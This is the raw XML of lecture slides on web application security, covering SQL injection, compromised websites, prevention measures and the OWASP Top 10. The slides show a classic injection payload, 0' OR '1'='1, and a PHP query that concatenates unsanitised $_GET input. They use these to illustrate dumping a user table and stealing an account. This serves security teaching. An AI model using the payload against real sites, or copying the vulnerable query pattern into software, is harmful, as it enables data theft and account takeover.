            <a:ln w="47625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none" w="lg" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="16" name="直線接點 15"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="3565044" y="2707796"/>
              <a:ext cx="2000264" cy="13648"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="47625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none" w="lg" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="直線接點 16"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="5942970" y="3942714"/>
              <a:ext cx="4429156" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="47625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none" w="lg" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="群組 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4601935" y="2202414"/>
            <a:ext cx="3470540" cy="646331"/>
            <a:chOff x="4610990" y="1643050"/>
            <a:chExt cx="3505200" cy="749863"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Line 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4610990" y="1643050"/>
              <a:ext cx="350520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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5038461" y="1643050"/>
              <a:ext cx="2992906" cy="749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42900" indent="-342900"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
                <a:t>1. Send an HTTP request </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="342900" indent="-342900"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
                <a:t>      with id = 5017</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="群組 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596452" y="2931681"/>
            <a:ext cx="3476010" cy="1479945"/>
            <a:chOff x="4604640" y="2143116"/>
            <a:chExt cx="3511550" cy="1717009"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5000628" y="2146153"/>
              <a:ext cx="3115562" cy="17139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 smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> 2. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
                <a:t>The server returns the </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
                <a:t>     user data with id=5017</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
                <a:t>(SQL query: </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>SELECT * FROM user WHERE id=‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>5017</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
                <a:t>)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Line 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4604640" y="2143116"/>
              <a:ext cx="351155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prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="triangle" w="med" len="med"/>
              <a:tailEnd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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="群組 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="993190" y="5220314"/>
            <a:ext cx="7079272" cy="923330"/>
            <a:chOff x="1000100" y="2425479"/>
            <a:chExt cx="3505200" cy="1071230"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Text Box 22"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1071538" y="2425479"/>
              <a:ext cx="3433762" cy="1071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 smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
                <a:t>The server returns all </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
                <a:t>tuples</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
                <a:t> in the user table </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>SELECT * FROM user WHERE id=‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>0’ OR ‘1’=‘1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
                <a:t>)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Line 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1000100" y="2428868"/>
              <a:ext cx="3505200" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="E46C0A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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="群組 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1000101" y="4631304"/>
            <a:ext cx="7079272" cy="369332"/>
            <a:chOff x="1000100" y="2425479"/>
            <a:chExt cx="3505200" cy="428492"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Text Box 22"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1071538" y="2425479"/>
              <a:ext cx="3433762" cy="4284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42900" indent="-342900"/>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>1. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
                <a:t>Send an HTTP request with id =</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>0’ OR ‘1’=‘1 </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Line 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1000100" y="2428868"/>
              <a:ext cx="3505200" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="E46C0A"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="triangle"/>
              <a:tailEnd type="non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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="頁尾版面配置區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Compromised Websites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Compromised legitimate websites can introduce malware and scams.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Compromised sites of 2010 include </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>the European site of popular tech blog </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>TechCrunch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> news outlets like the Jerusalem Post, and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>local government websites like that of the U.K.’s Somerset County Council.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>30,000 new malicious URLs every day.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>More than 70% of these are legitimate websites that have been hacked or compromised. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Sophos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t> security threat report 2011 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12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Compromised Websites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Criminals gain access to the data on a legitimate site and subvert it to their own ends. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>They achieve this by </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>exploiting vulnerabilities in the software that power the sites or </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>by stealing access credentials from malware-infected machines. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Sophos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t> security threat report 2011 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smtClean="0"/>
              <a:t>Prevention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Properly  configure the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Use secure application interfaces</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Validate (sanitize) all inputs from the user and even the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Apply detection/verification tools and repair errors before deployment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Commercial tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Free tools from research laboratories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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Common Vulnerabilities and Defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Objectives and Challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Opportunities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Conclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>References</a:t>
            </a:r>
          </a:p>
          <a:p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15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smtClean="0"/>
              <a:t>OWASP Top 10 Application Security Risks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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Broken Authentication and Session Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Insecure Direct Object Reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Misconfiguration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Sensitive Data Exposure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Missing Function Level Access Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Using Known Vulnerable Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t> Redirects and Forwards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400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What Changed from 2007 to 2010</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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1317399"/>
            <a:ext cx="9144032" cy="4897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17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What Changed from 2010 to 2013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18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Web Application Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="942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5380" y="1457324"/>
            <a:ext cx="9169380" cy="4595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SQL Injection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 smtClean="0"/>
              <a:t>Example (forget password):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	relevant code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The attacker may set things up to steal the account of Bob (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bob@example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>) by fooling the server to execute:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3000364" y="2932354"/>
            <a:ext cx="5143536" cy="928694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$</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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sql</a:t>
            </a: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 = “SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean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login_id</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" smtClean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, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean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passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" smtClean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, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean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full_name</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" smtClean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, </a:t>
            </a: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email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            FROM users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 smtClean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            </a:t>
            </a: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WHERE email = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" smtClean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‘” . </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>$_GET[‘email’] </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" smtClean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. “’”;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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="群組 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1214414" y="1714488"/>
            <a:ext cx="7000924" cy="1071570"/>
            <a:chOff x="1214414" y="3071810"/>
            <a:chExt cx="7572428" cy="1071570"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="矩形 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1214414" y="3071810"/>
              <a:ext cx="7572428" cy="1071570"/>
            </a:xfrm>
            <a:prstGeom prst="rect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TW" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Forgot Password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TW" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
                </a:rPr>
                <a:t>Email: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TW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新細明體" pitchFamily="18" charset="-120"/>
                </a:rPr>
                <a:t>We will send you</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
                </a:rPr>
                <a:t>r</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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新細明體" pitchFamily="18" charset="-120"/>
                </a:rPr>
                <a:t> account</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" b="1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新細明體" pitchFamily="18" charset="-120"/>
                </a:rPr>
                <a:t> information </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
                </a:rPr>
                <a:t>to your</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" b="1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新細明體" pitchFamily="18" charset="-120"/>
                </a:rPr>
                <a:t> email address. </a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-TW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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形 7"/>
